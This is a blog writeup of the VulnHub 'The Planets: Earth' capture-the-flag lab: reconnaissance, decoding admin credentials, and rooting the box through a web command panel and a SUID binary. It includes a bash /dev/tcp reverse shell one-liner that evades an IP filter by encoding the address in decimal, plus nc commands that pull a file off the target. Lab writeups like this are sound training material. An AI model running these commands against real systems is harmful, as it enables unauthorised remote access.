For this writeup, I’ll be going through how I completed VulnHub’s The Planets: Earth box.
Step 1: Nmap Scan
As usual, let’s perform an nmap scan to see what we’re dealing with
nmap -A -sS -p- -oN ./nmap_scan $BOX
- -A: Does a lot of stuff. According to man nmap, performs OS detection, version detection, script scanning, and traceroute
- -sS: TCP Scanning technique
- -p-: Scan all ports
- -oN <file_name>: Output nmap results to file for future reference
- $BOX: – Box IP
It seems we have a pretty setup with only 3 ports open. 22/ssh, 80/http, and 443/ssl. We also see we dig up some DNS information. Let’s deal with that first in the next step.
Step 2: Add to /etc/hosts
I’ll go ahead and add this entry from the nmap scan to /etc/hosts.
Step 3: Visit web pages
Now that we have that done, let’s check all of the sites and see what we can find. Let’s start by looking at port 80.
Mkay, nothing interesting here. Let’s check what’s on port 443.
and now let’s check those two entries we added to /etc/hosts
Step 4: Robots.txt
Checking each of the previously mentioned pages, you can eventually find an interesting robots.txt.
Checking each variation of /testingnotes.* against each of the extensions, you’ll eventually find /testingnotes.txt.
Step 5: Visit /testingnotes.txt
Seems to be some developer/admin notes left on the network. I went ahead and took note of the terra username for the admin portal. Let’s take a look at testdata.txt
It seems like this is what was used to encrypt the first few messages we see on the earth.local page. Let’s try to decode the messages on that page using this information.
Step 6: Decode Message(s)
Looking at the message on earth.local, it looks like it’s probably converting ASCII to hex. I’m going to detail how to decrypt the bottom message (starting with “2402”) because **spoiler**, the other messages are just gibberish.
First, we’ll need to convert the testdata.txt to hex. I just used a hex converter online for this.
I then took that and used it as the key on another website. I then put the message we want to decrypt into the left box for decryption.
I then took the hex results and converted it back to ASCII.
It seems that we get earthclimatechangebad4humans as a repeating string. Let’s try using this to login as terra.
Step 7: Login as Terra
I realize now that you’re probably wondering how I found the admin page. I forgot to mention previously that I ran gobuster on each of the web pages that we found. In doing that, I found that http://earth.local/admin exists:
Anyway, let’s visit that admin portal and login using the creds: terra/earthclimatechangebad4humans
Nice, it works and it seems to be a conveniently nice webpage for executing commands. Naturally, I’ll start by trying to pop a reverse shell.
Well, that’s annoying.
Step 8: Let’s see what we can do (user flag found)
Before proceeding forward, I start to dig around the filesystem and I eventually stumble across /var/earth_web which contains the user flag
Nice, now we just need to get the root flag.
Step 9: Reverse Shell Again
Doing some google searching, I find out that we can convert the IP to decimal and use bash to pop a reverse shell. This should allow for us to bypass the “Remote connections are forbidden” check because apparently it’s only checking if our input contains an IP. Don’t believe me? Watch what happens when I only input an IP with nothing else:
So anyway, let’s try it using my IP converted to decimal. For this, I just used an online tool to convert my IP.
bash -i >& /dev/tcp/172294500/10000 0>&1
Before executing this command, in another terminal I have a listener waiting with the command
nc -nvlp 10000
Now that our listener is up and running, we’ll go ahead and execute the command from the admin page and catch it with our listener.
Nice, we’re in. I’m just going to go ahead and spawn a TTY shell using python.
Step 10: Check SUIDs
Now that we have access to the system, let’s check our SUIDs and see if there’s anyway we can escalate to root.
find / -perm -4000 2>/dev/null
Hmm, /usr/bin/reset_root looks interesting. Running it seems to produce the following output
Awe yeah, I think we’re definitely looking in the right place. Let’s pull reset_root back to our box so we can take a closer look at it. We’ll do this by executing the following commands
nc -w 3 <my_ip> <my_port> < reset_root
nc -nvlp <port_i_want_to_use> > reset_root
Step 11: Investigate reset_root
Let’s start by running strings to see if we see anything interesting.
Taking a look at this, I can guess that it is trying to reset the root password based on some triggers. Let’s run ltrace to see what those triggers are. First we need to make the file executable on our box.
chmod +x ./reset_root
and then run ltrace on it
Ah, so it just checks to see if those files exist? Well, let’s go ahead and create those on the target box and then run it again.
Nice, now let’s switch to root.
and now grab the root flag from root’s home directory
Overall, this was a pretty fun easy-level box to knockout. If you found other ways to cracking this box, definitely let me know below in the commands!
As always, if you enjoyed this post please consider checking out my other posts here on WordPress:
- Data Structure: Linked List with Python
- VulnHub: Jangow 1.0.1 Writeup
- Hosting a Website with Github Pages
- Creating a Python Bot with Selenium
- Hack The Box: Impossible Password Reverse Engineering Challenge
- Asynchronous Server/Client with Python
Feel free to also follow me via my other social media accounts: Instagram, Twitter, Facebook, and Medium!
As always, if you liked what you read and you’d like to support me, please consider buying me some coffee! Every cup of coffee sent my way helps me stay awake after my full-time job so that I can produce more high quality blog posts! Any and all support would be greatly appreciated!
One thought on “VulnHub: The Planets Earth Writeup”